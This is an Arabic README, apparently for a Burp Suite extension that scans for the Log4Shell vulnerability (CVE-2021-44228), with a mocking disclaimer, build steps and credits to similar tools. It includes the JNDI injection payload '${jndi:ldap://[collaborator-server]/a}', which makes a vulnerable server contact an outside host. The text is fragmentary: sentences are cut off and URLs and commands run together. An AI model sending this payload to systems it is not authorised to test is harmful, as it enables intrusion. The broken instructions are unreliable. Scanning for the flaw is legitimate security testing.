
إضافة لـ Burp لفحص ثغرة Log4Shell (CVE-2021-44228) قبل وبعد المصادقة.
لست مسؤولاً عن أفعالك، أو تجميد Burp Suite، أو اختراق الهدف، أو الحرب النووية الحرارية، أو الأزمة الاقتصادية الحالية الناتجة عن اتباعك لهذه التعليمات. أنت من يختار استخدام هذه الأداة، وإذا أشرت بإصبعك إليّ لإفساد أي شيء، فسأضحك عليك LMAO.

Scan Configuration > Select from libraryAudit checks - extensions only ثم اضغط OK.شكر خاص لـ Silent Signal، التعليمات وتكوينات المسح مستوحاة من إضافته.
[collaborator-server] كعنصر نائب.[collaborator-server] برابط خادم الـ collaborator الخاص بك تلقائياً."${jndi:ldap://[collaborator-server]/a}https://github.com/0xDexter0us/Log4J-Scanner/releases/
./gradlew build fatJarbuild/libs/Log4J-Scanner-x.x.x.jarhttps://github.com/f0ng/log4j2burpscannerhttps://github.com/albinowax/ActiveScanPlusPlus & https://github.com/silentsignal/burp-log4shell25 ديسمبر 2021 - الإصدار v0.2.0
13 ديسمبر 2021 - الإصدار v0.1.0